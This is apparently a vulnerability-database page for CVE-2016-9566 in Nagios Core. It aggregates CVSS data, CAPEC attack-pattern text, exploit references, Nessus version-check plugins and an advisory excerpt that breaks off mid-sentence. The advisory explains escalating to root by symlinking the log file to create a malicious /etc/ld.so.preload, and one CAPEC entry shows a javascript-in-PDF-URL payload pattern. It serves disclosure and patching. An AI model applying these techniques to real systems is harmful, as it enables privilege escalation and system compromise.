Vulnerabilities > CVE-2016-9566 - Permissions, Privileges, and Access Controls vulnerability in Nagios
Attack vector
LOCAL Attack complexity
LOW Privileges required
NONE Confidentiality impact
COMPLETE Integrity impact
COMPLETE Availability impact
COMPLETE Summary
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Accessing, Modifying or Executing Executable Files An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
- Leverage Executable Code in Non-Executable Files An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
- Blue Boxing This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.
- Restful Privilege Elevation Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.
- Target Programs with Elevated Privileges This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user try to execute its code at the same level as a privileged system call.
Exploit-Db
description Nagios Core < 4.2.4 - Privilege Escalation. CVE-2016-9566. Local exploit for Linux platform. Tags: Local file exploits/linux/local/40921.sh id EDB-ID:40921 last seen 2016-12-15 modified 2016-12-15 platform linux port published 2016-12-15 reporter Exploit-DB source https://www.exploit-db.com/download/40921/ title Nagios Core < 4.2.4 - Privilege Escalation type local description Nagios Core < 4.2.2 - Curl Command Injection / Remote Code Execution. CVE-2016-9565. Remote exploit for Linux platform. Tags: Remote file exploits/linux/remote/40920.py id EDB-ID:40920 last seen 2016-12-15 modified 2016-12-15 platform linux port published 2016-12-15 reporter Exploit-DB source https://www.exploit-db.com/download/40920/ title Nagios Core < 4.2.2 - Curl Command Injection / Remote Code Execution type remote
Nessus
NASL family Debian Local Security Checks NASL id DEBIAN_DLA-1615.NASL description Several issues were corrected in nagios3, a monitoring and management system for hosts, services and networks. CVE-2018-18245 Maximilian Boehner of usd AG found a cross-site scripting (XSS) vulnerability in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. In order to do this the attacker needs to be able to manipulate the output returned by nagios checks, e.g. by replacing a plugin on one of the monitored endpoints. Execution of the payload then requires that an authenticated user creates an alert summary report which contains the corresponding output. CVE-2016-9566 It was discovered that local users with access to an account in the nagios group are able to gain root privileges via a symlink attack on the debug log file. CVE-2014-1878 An issue was corrected that allowed remote attackers to cause a stack-based buffer overflow and subsequently a denial of service (segmentation fault) via a long message to cmd.cgi. CVE-2013-7205 | CVE-2013-7108 A flaw was corrected in Nagios that could be exploited to cause a denial of service. This vulnerability is induced due to an off-by-one error within the process_cgivars() function, which can be exploited to cause an out-of-bounds read by sending a specially crafted key value to the Nagios web UI. For Debian 8 last seen 2020-03-26 modified 2018-12-27 plugin id 119875 published 2018-12-27 reporter This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/119875 title Debian DLA-1615-1 : nagios3 security update code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DLA-1615-1. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(119875); script_version("1.4"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/25"); script_cve_id("CVE-2013-7108", "CVE-2013-7205", "CVE-2014-1878", "CVE-2016-9566", "CVE-2018-18245"); script_bugtraq_id(64363, 64489, 65605); script_name(english:"Debian DLA-1615-1 : nagios3 security update"); script_summary(english:"Checks dpkg output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security update." ); script_set_attribute( attribute:"description", value: "Several issues were corrected in nagios3, a monitoring and management system for hosts, services and networks. CVE-2018-18245 Maximilian Boehner of usd AG found a cross-site scripting (XSS) vulnerability in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. In order to do this the attacker needs to be able to manipulate the output returned by nagios checks, e.g. by replacing a plugin on one of the monitored endpoints. Execution of the payload then requires that an authenticated user creates an alert summary report which contains the corresponding output. CVE-2016-9566 It was discovered that local users with access to an account in the nagios group are able to gain root privileges via a symlink attack on the debug log file. CVE-2014-1878 An issue was corrected that allowed remote attackers to cause a stack-based buffer overflow and subsequently a denial of service (segmentation fault) via a long message to cmd.cgi. CVE-2013-7205 | CVE-2013-7108 A flaw was corrected in Nagios that could be exploited to cause a denial of service. This vulnerability is induced due to an off-by-one error within the process_cgivars() function, which can be exploited to cause an out-of-bounds read by sending a specially crafted key value to the Nagios web UI. For Debian 8 'Jessie', these problems have been fixed in version 3.5.1.dfsg-2+deb8u1. We recommend that you upgrade your nagios3 packages. NOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://lists.debian.org/debian-lts-announce/2018/12/msg00014.html" ); script_set_attribute( attribute:"see_also", value:"https://packages.debian.org/source/jessie/nagios3" ); script_set_attribute(attribute:"solution", value:"Upgrade the affected packages."); script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-cgi"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-core"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-dbg"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-doc"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0"); script_set_attribute(attribute:"vuln_publication_date", value:"2014/01/15"); script_set_attribute(attribute:"patch_publication_date", value:"2018/12/24"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/12/27"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"8.0", prefix:"nagios3", reference:"3.5.1.dfsg-2+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"nagios3-cgi", reference:"3.5.1.dfsg-2+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"nagios3-common", reference:"3.5.1.dfsg-2+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"nagios3-core", reference:"3.5.1.dfsg-2+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"nagios3-dbg", reference:"3.5.1.dfsg-2+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"nagios3-doc", reference:"3.5.1.dfsg-2+deb8u1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-100.NASL description This update for icinga includes various upstream fixes and the following security security fixes : - icinga was updated to version 1.14.0 - the classic-UI was vulnerable to a cross site scripting attack (CVE-2015-8010, boo#952777) - A user with nagios privileges could have gained root privileges by placing a symbolic link at the logfile location (CVE-2016-9566, boo#1014637) last seen 2020-06-05 modified 2017-01-17 plugin id 96545 published 2017-01-17 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96545 title openSUSE Security Update : icinga (openSUSE-2017-100) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2017-100. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(96545); script_version("3.4"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2015-8010", "CVE-2016-9566"); script_name(english:"openSUSE Security Update : icinga (openSUSE-2017-100)"); script_summary(english:"Check for the openSUSE-2017-100 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update for icinga includes various upstream fixes and the following security security fixes : - icinga was updated to version 1.14.0 - the classic-UI was vulnerable to a cross site scripting attack (CVE-2015-8010, boo#952777) - A user with nagios privileges could have gained root privileges by placing a symbolic link at the logfile location (CVE-2016-9566, boo#1014637)" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1014637" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=952777" ); script_set_attribute( attribute:"solution", value:"Update the affected icinga packages." ); script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-mysql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-oracle"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-pgsql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-plugins-downtimes"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-plugins-eventhandlers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-www"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-www-config"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-www-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:monitoring-tools"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:monitoring-tools-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.1"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2"); script_set_attribute(attribute:"patch_publication_date", value:"2017/01/16"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/17"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.1|SUSE42\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.1 / 42.2", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.1", reference:"icinga-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-debuginfo-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-debugsource-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-devel-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-debuginfo-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-mysql-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-oracle-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-pgsql-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-plugins-downtimes-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-plugins-eventhandlers-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-www-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-www-config-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"icinga-www-debuginfo-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"monitoring-tools-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"monitoring-tools-debuginfo-1.14.0-3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-debuginfo-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-debugsource-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-devel-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-debuginfo-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-mysql-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-oracle-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-pgsql-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-plugins-downtimes-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-plugins-eventhandlers-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-www-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-www-config-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-www-debuginfo-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"monitoring-tools-1.14.0-4.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"monitoring-tools-debuginfo-1.14.0-4.1") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "icinga / icinga-debuginfo / icinga-debugsource / icinga-devel / etc"); }NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-0259.NASL description An update for nagios is now available for Red Hat Gluster Storage 3.1 for RHEL 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Nagios is a program that monitors hosts and services on your network, and has the ability to send email or page alerts when a problem arises or is resolved. Security Fix(es) : * It was found that an attacker who could control the content of an RSS feed could execute code remotely using the Nagios web interface. This flaw could be used to gain access to the remote system and in some scenarios control over the system. (CVE-2016-9565) * A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the last seen 2020-06-01 modified 2020-06-02 plugin id 97061 published 2017-02-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97061 title RHEL 6 : nagios (RHSA-2017:0259) NASL family Debian Local Security Checks NASL id DEBIAN_DLA-751.NASL description Nagios was found to be vulnerable to two security issues that, when combined, lead to a remote root code execution vulnerability. Fortunately, the hardened permissions of the Debian package limit the effect of those to information disclosure, but privilege escalation to root is still possible locally. CVE-2016-9565 Improper sanitization of RSS feed input enables unauthenticated remote read and write of arbitrary files which may lead to remote code execution if the web root is writable. CVE-2016-9566 Unsafe logfile handling allows unprivileged users to escalate their privileges to root. In wheezy, this is possible only through the debug logfile which is disabled by default. For Debian 7 last seen 2020-03-17 modified 2016-12-20 plugin id 96012 published 2016-12-20 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96012 title Debian DLA-751-1 : nagios3 security update NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-3253-2.NASL description USN-3253-1 fixed vulnerabilities in Nagios. The update prevented log files from being displayed in the web interface. This update fixes the problem. We apologize for the inconvenience. It was discovered that Nagios incorrectly handled certain long strings. A remote authenticated attacker could use this issue to cause Nagios to crash, resulting in a denial of service, or possibly obtain sensitive information. (CVE-2013-7108, CVE-2013-7205) It was discovered that Nagios incorrectly handled certain long messages to cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to crash, resulting in a denial of service. (CVE-2014-1878) Dawid Golunski discovered that Nagios incorrectly handled symlinks when accessing log files. A local attacker could possibly use this issue to elevate privileges. In the default installation of Ubuntu, this should be prevented by the Yama link restrictions. (CVE-2016-9566). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 100677 published 2017-06-08 reporter Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/100677 title Ubuntu 14.04 LTS / 16.04 LTS / 16.10 / 17.04 : nagios3 regression (USN-3253-2) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-0258.NASL description An update for nagios is now available for Red Hat Gluster Storage 3.1 for RHEL 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Nagios is a program that monitors hosts and services on your network, and has the ability to send email or page alerts when a problem arises or is resolved. Security Fix(es) : * It was found that an attacker who could control the content of an RSS feed could execute code remotely using the Nagios web interface. This flaw could be used to gain access to the remote system and in some scenarios control over the system. (CVE-2016-9565) * A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the last seen 2020-06-01 modified 2020-06-02 plugin id 97060 published 2017-02-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97060 title RHEL 7 : nagios (RHSA-2017:0258) NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201702-26.NASL description The remote host is affected by the vulnerability described in GLSA-201702-26 (Nagios: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Nagios. Please review the CVE identifiers referenced below for details. Impact : A local attacker, who either is already Nagios’s system user or belongs to Nagios’s group, could potentially escalate privileges. In addition, a remote attacker could read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 97269 published 2017-02-21 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97269 title GLSA-201702-26 : Nagios: Multiple vulnerabilities NASL family Fedora Local Security Checks NASL id FEDORA_2017-D270E932A3.NASL description Update to close CVE Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2018-01-15 plugin id 105984 published 2018-01-15 reporter This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105984 title Fedora 27 : nagios (2017-d270e932a3) NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201612-51.NASL description The remote host is affected by the vulnerability described in GLSA-201612-51 (Icinga: Privilege escalation) Icinga daemon was found to perform unsafe operations when handling the log file. Impact : A local attacker, who either is already Icinga’s system user or belongs to Icinga’s group, could potentially escalate privileges. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 96226 published 2017-01-03 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96226 title GLSA-201612-51 : Icinga: Privilege escalation NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201710-20.NASL description The remote host is affected by the vulnerability described in GLSA-201710-20 (Nagios: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Nagios. Please review the referenced CVE identifiers for details. Impact : A remote attacker could possibly escalate privileges to root, thus allowing the execution of arbitrary code, by leveraging CVE-2016-9565. Additionally, a local attacker could cause a Denial of Service condition against arbitrary processes due to the improper dropping of privileges. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 103913 published 2017-10-18 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103913 title GLSA-201710-20 : Nagios: Multiple vulnerabilities NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-3253-1.NASL description It was discovered that Nagios incorrectly handled certain long strings. A remote authenticated attacker could use this issue to cause Nagios to crash, resulting in a denial of service, or possibly obtain sensitive information. (CVE-2013-7108, CVE-2013-7205) It was discovered that Nagios incorrectly handled certain long messages to cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to crash, resulting in a denial of service. (CVE-2014-1878) Dawid Golunski discovered that Nagios incorrectly handled symlinks when accessing log files. A local attacker could possibly use this issue to elevate privileges. In the default installation of Ubuntu, this should be prevented by the Yama link restrictions. (CVE-2016-9566). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 99182 published 2017-04-04 reporter Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99182 title Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : nagios3 vulnerabilities (USN-3253-1) NASL family Amazon Linux Local Security Checks NASL id ALA_ALAS-2017-899.NASL description Multiple off-by-one errors in Nagios Core 3.5.1, 4.0.2, and earlier, and Icinga before 1.8.5, 1.9 before 1.9.4, and 1.10 before 1.10.2 allow remote authenticated users to obtain sensitive information from process memory or cause a denial of service (crash) via a long string in the last key value in the variable list to the process_cgivars function in (1) avail.c, (2) cmd.c, (3) config.c, (4) extinfo.c, (5) histogram.c, (6) notifications.c, (7) outages.c, (8) status.c, (9) statusmap.c, (10) summary.c, and (11) trends.c in cgi/, which triggers a heap-based buffer over-read. Stack-based buffer overflow in the cmd_submitf function in cgi/cmd.c in Nagios Core, possibly 4.0.3rc1 and earlier, and Icinga before 1.8.6, 1.9 before 1.9.5, and 1.10 before 1.10.3 allows remote attackers to cause a denial of service (segmentation fault) via a long message to cmd.cgi. Various command-execution flaws were found in the Snoopy library included with Nagios. These flaws allowed remote attackers to execute arbitrary commands by manipulating Nagios HTTP headers. A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the last seen 2020-06-01 modified 2020-06-02 plugin id 103651 published 2017-10-04 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103651 title Amazon Linux AMI : nagios (ALAS-2017-899)
Packetstorm
| data source | https://packetstormsecurity.com/files/download/140169/nagioscore-exec.txt |
| id | PACKETSTORM:140169 |
| last seen | 2016-12-15 |
| published | 2016-12-15 |
| reporter | Dawid Golunski |
| source | https://packetstormsecurity.com/files/140169/Nagios-Core-Curl-Command-Injection-Code-Execution.html |
| title | Nagios Core Curl Command Injection / Code Execution |
Redhat
| advisories |
| ||||||||||||||||||||||||
| rpms |
|
Seebug
| bulletinFamily | exploit |
| description | INTRODUCTION ------------------------- Nagios Core daemon in versions below 4.2.4 was found to perform unsafe operations when handling the log file. This could be exploited by malicious local attackers to escalate their privileges from 'nagios' system user, or from a user belonging to 'nagios' group, to root. The exploit could enable the attackers to fully compromise the system on which a vulnerable Nagios version was installed. To obtain the necessary level of access, the attackers could use another Nagios vulnerability discovered by the author of this advisory - CVE-2016-9565 which has been linked in the references. DESCRIPTION ------------------------- Default installation of Nagios Core creates the log directory with the following permissions: ``` drwxrwsr-x 5 nagios nagios ``` Nagios daemon was found to open the log file before dropping its root privileges on startup: ``` 8148 open("/usr/local/nagios/var/nagios.log", O_RDWR|O_CREAT|O_APPEND, 0666) = 4 8148 fcntl(4, F_SETFD, FD_CLOEXEC) = 0 8148 fchown(4, 1001, 1001) = 0 8148 getegid() = 0 8148 setgid(1001) = 0 8148 geteuid() = 0 [...] ``` If an attacker managed to gain access to an account of 'nagios' or any other account belonging to the 'nagios' group, they would be able to replace the log file with a symlink to an arbitrary file on the system. This vulnerability could be used by an attacker to escalate their privileges from nagios user/group to root for example by creating a malicious /etc/ld.so.preload file. The file would be created with the following nagios permissions due to the fchown operation shown above: ``` -rw-r--r-- 1 nagios nagios 